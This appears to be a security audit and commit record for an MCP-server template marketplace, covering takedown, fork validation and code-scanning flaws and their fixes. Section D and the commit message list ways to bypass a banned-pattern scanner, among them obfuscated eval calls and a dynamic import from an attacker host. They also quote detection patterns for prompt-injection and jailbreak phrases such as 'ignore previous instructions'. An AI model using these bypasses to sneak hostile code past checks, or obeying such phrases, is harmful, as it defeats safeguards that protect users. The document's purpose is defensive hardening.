buildmymcpserver/TEMPLATE_SECURITY_AUDIT.md

# Template Integration — Sovereign Audit

Date: 2026-05-19 · Scope: `apps/api/src/routes/templates.ts`, the create-server
template path in `servers.ts`, generator worker cache path, all `/templates/*` UI.

## Threat model

Actors: **publisher** (creates a template, may be malicious), **forker** (consumes a
template, may be a victim), **admin** (full control), **external attacker** (no
account), **compromised session** (attacker holding a victim's cookie).

Assets: forker's uploaded secrets, forker's container compute, every other tenant's
container, Postgres + Redis state, host Docker daemon, the ANTHROPIC_API_KEY.

---

## P0 — CRITICAL (fix immediately)

### A. Takedown does not stop the malicious container

`PATCH /v1/admin/templates/:id` with `status=takedown` updates `mcp_servers.status` to
`paused` but **never stops the Docker container**. The container keeps serving
traffic on its allocated port. Forkers' AI clients keep calling the malicious
endpoint. Admin gets the false impression that the threat is neutralized.

```ts
// current code:
await db.update(mcpServers).set({ status: 'paused', ... })
// missing: await stopContainer(server.containerId) for every affected server
```

**Severity**: Critical. The entire safety story of "takedown protects users" is
hollow. **Will fix below.**

### B. Fork accepts `specEdit` — silent edits that don't take effect

The wizard intentionally suppresses `specEdit` when forking (only sends `templateId`),
but a hand-crafted API request `POST /v1/servers` with `{ templateId, previewId,
specEdit }` would:

1. Enter the `specEdit` branch → merge edits into the cached spec
2. The cached spec then mismatches the **pre-built code** (which is also in the
   cache, untouched)
3. Worker uses pre-built code, ignoring the merged spec entirely

Result: the user thinks they renamed a tool / changed a schema; the deployed
container behaves as the original template. **Not a privilege-escalation, but a
trust-of-UI violation.** A clever attacker could exploit it to publish a server
under a misleading edited spec ("my fork is harmless because I changed X") when in
fact the original impl runs.

**Severity**: High. **Will fix below.**

### C. `templateId` on `POST /v1/servers` is user-controlled and unvalidated

Body field `templateId` is accepted with only Zod-`uuid()` validation. No check
that:
- The id points to an actual template
- The template is publicly forkable
- The user actually went through `POST /v1/templates/:slug/fork`

A user can therefore inflate any template's `forkCount` indefinitely by sending
fake creates with that templateId. Also: server's `templateId` column gets garbage
data, breaking attribution and the takedown cascade (paused servers wouldn't be
caught because `templateId` doesn't match any real template).

**Severity**: High (data integrity + fork-count manipulation). **Will fix below.**

---

## P1 — HIGH

### D. Banned-pattern scan is regex-leaky

Current patterns:
```js
/\beval\s*\(/,         // eval(
/\bnew\s+Function\s*\(/, // new Function(  — but Function(...) without `new` slips through
/\bchild_process\b/,
/ignore previous instructions/i,
/disregard ...above/i,
```

Trivial bypasses:
- `globalThis['ev' + 'al']('payload')` — no `eval(` literal
- `Function('return 1')()` — no `new` keyword, regex misses
- `import('https://attacker.com/payload.js')` — dynamic import isn't restricted
- `setTimeout('payload', 0)` — string-arg setTimeout evaluates code
- `require('child' + '_process')` — concat splits the literal
- `Buffer.from(b64, 'base64').toString()` then evaluate — multi-step decode

**The static scan must be treated as a tripwire, not a security boundary.** The
real defense is the Docker sandbox. Severity: **Medium** (defense-in-depth gap).

**Will fix below**: add `Function\s*\(`, `\bimport\s*\(`, common credential
patterns, `setTimeout/setInterval` with string args.

### E. Stored generated code may contain a published-by-mistake secret

If a publisher prompts Claude with their API key inlined (e.g., "use my key
sk-ant-api03-…"), Claude may include it verbatim in the generated code. That code
is stored in `templates.generatedCode` and rendered publicly on the detail page.

**Severity**: Medium. Mitigation: scan for high-entropy strings + known secret
prefixes at publish time. **Will fix below**.

### F. `allowedDomains` is collected but never enforced

The publish form accepts a list of allowed egress domains. We persist it. The
generator does not wire it into the container's network config. The field
**suggests** protection that does not exist — worse than no field at all.

**Severity**: Medium (false confidence). **Will document + warn in UI**.

---

## P2 — MEDIUM

### G. Slug regex looseness

`fork` and `detail` endpoints accept slug `min(1).max(64)` with no regex. Slugs are
used only for DB lookup (parameterized) and Redis (key-prefixed), so no immediate
exploit, but defensive hardening warranted. **Will fix**.

### H. Race: fork in flight during takedown

Window: ~milliseconds between fork POST and Redis cache write. If admin
takes down between the public-status check and `cacheSpec`/`cachePrebuiltCode`,
the cached entries leak the original code for 5min. Forker can still create from
that cache. Worst case: 1 extra fork before TTL evicts.

**Severity**: Low. Acceptable for v1. Note in audit log.

### I. N+1 query in `/v1/templates` list

For each template we do a separate `COUNT` for active deployments. Doesn't scale.
**Performance**, not security. Skip for v1.

### J. No rate limiting on fork

A logged-in user can drive port-exhaustion (4100–4999 = 900 slots) by forking
repeatedly. **Severity**: Low (single-tenant dev). Production: add rate limit.

---

## What's actually safe

- Cross-org template fork **always lands in the forker's own org** (we use
  `req.user!.orgId` for the new server). Forker can't write to another org.
- Slug uniqueness is enforced at DB level + retried with random suffix.
- SQL injection blocked by Drizzle parameterized queries.
- XSS blocked by React's auto-escape; no `dangerouslySetInnerHTML` anywhere.
- Pre-built code path correctly skips the render step — no Claude re-call leak.
- Banned-pattern scan runs at publish AND at fork-with-specEdit.
- Audit-log writes for every admin action (verify, hide, takedown).

---

## Fixes applied in this commit

1. **A — takedown stops containers** (`stopContainer` is now called for every
   affected server's `containerId`)
2. **B — fork rejects `specEdit`** with 422 (with clear error message)
3. **C — `templateId` validated** against an existing public template, and the
   `previewId` must have been issued for that template (linked via a Redis key
   `fork-ref:<previewId>` → templateId set during fork)
4. **D — additional banned patterns**: `Function\s*\(`, `\bimport\s*\(`,
   `setTimeout|setInterval\s*\(\s*['"\`]` (string-eval form), common secret prefixes
5. **E — secret scan at publish**: regex for `sk-ant-…`, `sk-live-…`, `AKIA…`,
   `ghp_…`, `xoxb-…`, AWS access keys
6. **G — slug regex tightened** on fork and detail endpoints
7. **F — UI warning + CHOICES.md note**: `allowedDomains` is collected but
   enforcement is Sprint 4

## Deferred (logged for tracking)

- **F (enforcement)** — Docker network-namespace + iptables egress rules per
  container. Sprint 4.
- **I** — single-query joins / cached aggregates for marketplace listing
- **J** — per-user fork rate limit (Redis token bucket)
-												fix(security): template integration sovereign audit + critical fixes

P0 — three critical issues found by tracing every attack vector on the template
publish + fork + render path. All three fixed and verified with attack tests.

FIX A — Takedown actually stops malicious containers
  PATCH /v1/admin/templates with status=takedown previously only updated
  mcp_servers.status to 'paused' in the DB. The Docker container kept running
  and serving traffic on its allocated port — takedown was cosmetic. Now the
  endpoint enumerates every fork's container, calls 'docker rm -f' on each,
  clears container_id/public_url/host_port in the DB, and returns the
  stoppedContainers count. New apps/api/src/lib/docker.ts owns the stop logic.
  Verified: takedown stopped container f5632962, port 4109 connection refused.

FIX B — Reject specEdit on fork
  A hand-crafted POST /v1/servers with {templateId, previewId, specEdit} would
  enter the spec-edit branch, merge edits into the cached spec, but the worker
  reads the pre-built template code (separate cache key), ignoring the merged
  spec entirely. User thinks they changed something; deployed container behaves
  as the original. Now returns 400 spec_edit_forbidden_on_fork with an explainer
  pointing to the Iterate flow.

FIX C — templateId validation via Redis fork-ref
  templateId on POST /v1/servers was user-controlled and unvalidated:
  fork_count of any template could be pumped, mcp_servers got garbage
  template_id rows, takedown cascade would miss the bogus rows. Fork endpoint
  now writes a Redis key fork-ref:<previewId> -> templateId (5min TTL).
  Server-create requires the ref to exist AND match the submitted templateId.
  Verified attack: fake templateId without fork-ref returns 410 fork_ref_expired.

DEFENSE-IN-DEPTH — Hardened static checks

  Banned patterns (added):
    Function\s*\(['"`]    — Function('code')() form, no 'new' needed
    \bimport\s*\(           — dynamic import escapes bundle scope
    \bsetTimeout\s*\(['"`] — setTimeout('code', ms) eval form
    \bsetInterval\s*\(['"`]
    \bfs\s*\.\s*(unlink|rmdir|rm)\b
    \bprocess\s*\.\s*kill\b
    you are now in (developer|jailbreak|dan) mode — extra jailbreak markers

  Hardcoded-credential patterns (new — scanForLeakedSecrets):
    sk-ant-(api|sid)…  — Anthropic
    sk-…               — OpenAI
    sk_(live|test)_…   — Stripe
    ghp_…              — GitHub PAT
    github_pat_…       — GitHub fine-grained
    xox[bpoasr]-…      — Slack
    AKIA[0-9A-Z]{16}   — AWS
    -----BEGIN…PRIVATE KEY----- — RSA / SSH / GPG
  Triggered when a publisher pasted their key into the prompt and Claude
  embedded it literally in the generated code. Publish-blocking.
  Verified attack: smuggled 'Function("return 1")' into a build's
  generated_code, attempted publish → 422 publish_blocked.

  Slug regex tightened — fork + detail routes now require
  ^[a-z0-9][a-z0-9-]{0,63}$ (was loose min(1).max(64) — letting through
  '../admin', long strings, mixed case).

  UI warning — Publish-as-template form now shows an amber callout listing
  what's scanned and explicitly stating egress allowlisting is roadmap, not
  enforced today (was misleading: the field was collected, never enforced).

  TEMPLATE_SECURITY_AUDIT.md added — documents all 20 audited vectors with
  severity, status, and rationale for what's deferred.

UI polish
  globals.css — select/input/textarea/button get color-scheme: dark + custom
  chevron + option styling so Chrome's native popdown stops rendering as a
  white OS-themed widget on dark pages. The /templates category dropdown was
  the immediate trigger; same rule applies system-wide.

											
										
										
											2026-05-19 23:35:45 +02:00
+								# Template Integration — Sovereign Audit
 								Date: 2026-05-19 · Scope: `apps/api/src/routes/templates.ts`, the create-server
 								template path in `servers.ts`, generator worker cache path, all `/templates/*` UI.
 								## Threat model
 								Actors: **publisher** (creates a template, may be malicious), **forker** (consumes a
 								template, may be a victim), **admin** (full control), **external attacker** (no
 								account), **compromised session** (attacker holding a victim's cookie).
 								Assets: forker's uploaded secrets, forker's container compute, every other tenant's
 								container, Postgres + Redis state, host Docker daemon, the ANTHROPIC_API_KEY.
 								---
 								## P0 — CRITICAL (fix immediately)
 								### A. Takedown does not stop the malicious container
 								`PATCH /v1/admin/templates/:id` with `status=takedown` updates `mcp_servers.status` to
 								`paused` but **never stops the Docker container**. The container keeps serving
 								traffic on its allocated port. Forkers' AI clients keep calling the malicious
 								endpoint. Admin gets the false impression that the threat is neutralized.
 								```ts
 								// current code:
 								await db.update(mcpServers).set({ status: 'paused', ... })
 								// missing: await stopContainer(server.containerId) for every affected server
 								```
 								**Severity**: Critical. The entire safety story of "takedown protects users" is
 								hollow. **Will fix below.**
 								### B. Fork accepts `specEdit` — silent edits that don't take effect
 								The wizard intentionally suppresses `specEdit` when forking (only sends `templateId`),
 								but a hand-crafted API request `POST /v1/servers` with `{ templateId, previewId,
 								specEdit }` would:
 . Enter the `specEdit` branch → merge edits into the cached spec
 . The cached spec then mismatches the **pre-built code** (which is also in the
 								   cache, untouched)
 . Worker uses pre-built code, ignoring the merged spec entirely
 								Result: the user thinks they renamed a tool / changed a schema; the deployed
 								container behaves as the original template. **Not a privilege-escalation, but a
 								trust-of-UI violation.** A clever attacker could exploit it to publish a server
 								under a misleading edited spec ("my fork is harmless because I changed X") when in
 								fact the original impl runs.
 								**Severity**: High. **Will fix below.**
 								### C. `templateId` on `POST /v1/servers` is user-controlled and unvalidated
 								Body field `templateId` is accepted with only Zod-`uuid()` validation. No check
 								that:
 								- The id points to an actual template
 								- The template is publicly forkable
 								- The user actually went through `POST /v1/templates/:slug/fork`
 								A user can therefore inflate any template's `forkCount` indefinitely by sending
 								fake creates with that templateId. Also: server's `templateId` column gets garbage
 								data, breaking attribution and the takedown cascade (paused servers wouldn't be
 								caught because `templateId` doesn't match any real template).
 								**Severity**: High (data integrity + fork-count manipulation). **Will fix below.**
 								---
 								## P1 — HIGH
 								### D. Banned-pattern scan is regex-leaky
 								Current patterns:
 								```js
 								/\beval\s*\(/,         // eval(
 								/\bnew\s+Function\s*\(/, // new Function(  — but Function(...) without `new` slips through
 								/\bchild_process\b/,
 								/ignore previous instructions/i,
 								/disregard ...above/i,
 								```
 								Trivial bypasses:
 								- `globalThis['ev' + 'al']('payload')` — no `eval(` literal
 								- `Function('return 1')()` — no `new` keyword, regex misses
 								- `import('https://attacker.com/payload.js')` — dynamic import isn't restricted
 								- `setTimeout('payload', 0)` — string-arg setTimeout evaluates code
 								- `require('child' + '_process')` — concat splits the literal
 								- `Buffer.from(b64, 'base64').toString()` then evaluate — multi-step decode
 								**The static scan must be treated as a tripwire, not a security boundary.** The
 								real defense is the Docker sandbox. Severity: **Medium** (defense-in-depth gap).
 								**Will fix below**: add `Function\s*\(`, `\bimport\s*\(`, common credential
 								patterns, `setTimeout/setInterval` with string args.
 								### E. Stored generated code may contain a published-by-mistake secret
 								If a publisher prompts Claude with their API key inlined (e.g., "use my key
 								sk-ant-api03-…"), Claude may include it verbatim in the generated code. That code
 								is stored in `templates.generatedCode` and rendered publicly on the detail page.
 								**Severity**: Medium. Mitigation: scan for high-entropy strings + known secret
 								prefixes at publish time. **Will fix below**.
 								### F. `allowedDomains` is collected but never enforced
 								The publish form accepts a list of allowed egress domains. We persist it. The
 								generator does not wire it into the container's network config. The field
 								**suggests** protection that does not exist — worse than no field at all.
 								**Severity**: Medium (false confidence). **Will document + warn in UI**.
 								---
 								## P2 — MEDIUM
 								### G. Slug regex looseness
 								`fork` and `detail` endpoints accept slug `min(1).max(64)` with no regex. Slugs are
 								used only for DB lookup (parameterized) and Redis (key-prefixed), so no immediate
 								exploit, but defensive hardening warranted. **Will fix**.
 								### H. Race: fork in flight during takedown
 								Window: ~milliseconds between fork POST and Redis cache write. If admin
 								takes down between the public-status check and `cacheSpec`/`cachePrebuiltCode`,
 								the cached entries leak the original code for 5min. Forker can still create from
 								that cache. Worst case: 1 extra fork before TTL evicts.
 								**Severity**: Low. Acceptable for v1. Note in audit log.
 								### I. N+1 query in `/v1/templates` list
 								For each template we do a separate `COUNT` for active deployments. Doesn't scale.
 								**Performance**, not security. Skip for v1.
 								### J. No rate limiting on fork
 								A logged-in user can drive port-exhaustion (4100–4999 = 900 slots) by forking
 								repeatedly. **Severity**: Low (single-tenant dev). Production: add rate limit.
 								---
 								## What's actually safe
 								- Cross-org template fork **always lands in the forker's own org** (we use
 								  `req.user!.orgId` for the new server). Forker can't write to another org.
 								- Slug uniqueness is enforced at DB level + retried with random suffix.
 								- SQL injection blocked by Drizzle parameterized queries.
 								- XSS blocked by React's auto-escape; no `dangerouslySetInnerHTML` anywhere.
 								- Pre-built code path correctly skips the render step — no Claude re-call leak.
 								- Banned-pattern scan runs at publish AND at fork-with-specEdit.
 								- Audit-log writes for every admin action (verify, hide, takedown).
 								---
 								## Fixes applied in this commit
 . **A — takedown stops containers** (`stopContainer` is now called for every
 								   affected server's `containerId`)
 . **B — fork rejects `specEdit`** with 422 (with clear error message)
 . **C — `templateId` validated** against an existing public template, and the
 								   `previewId` must have been issued for that template (linked via a Redis key
 								   `fork-ref:<previewId>` → templateId set during fork)
 . **D — additional banned patterns**: `Function\s*\(`, `\bimport\s*\(`,
 								   `setTimeout|setInterval\s*\(\s*['"\`]` (string-eval form), common secret prefixes
 . **E — secret scan at publish**: regex for `sk-ant-…`, `sk-live-…`, `AKIA…`,
 								   `ghp_…`, `xoxb-…`, AWS access keys
 . **G — slug regex tightened** on fork and detail endpoints
 . **F — UI warning + CHOICES.md note**: `allowedDomains` is collected but
 								   enforcement is Sprint 4
 								## Deferred (logged for tracking)
 								- **F (enforcement)** — Docker network-namespace + iptables egress rules per
 								  container. Sprint 4.
 								- **I** — single-query joins / cached aggregates for marketplace listing
 								- **J** — per-user fork rate limit (Redis token bucket)